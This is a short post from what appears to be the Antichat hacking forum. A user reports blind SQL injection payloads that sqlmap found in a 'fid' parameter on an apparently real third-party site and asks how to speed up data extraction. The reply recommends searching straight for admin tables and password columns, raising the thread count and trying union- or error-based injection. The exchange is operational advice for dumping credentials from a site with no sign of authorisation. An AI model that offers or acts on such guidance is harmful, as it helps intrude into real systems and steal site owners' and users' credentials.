11.11.2017, 15:04
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от Muracha
↑
Есть уязвимый сайт, который очень долго выводит и перебирает базы данных, таблицы, колонки.
Код:
arameter: fid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: &fid=2656 AND 5461=5461
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: &fid=2656 AND SLEEP(10)
---
Понимаю,что слепая иньекция, но можно ли увеличить скорость перебора?
Код:
[13:14:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:14:26] [INFO] retrieved:
[13:14:28] [WARNING] reflective value(s) found and filtering out
77
тут лучше тогда сразу искать нужные данные --search -T admin и т.д --search -C pass чтобы время не тратить. И потоков побольше , если можно --threads=15!
Может еще есть какие уязвимости, которые можно в Union или Error раскрутить
|
|
|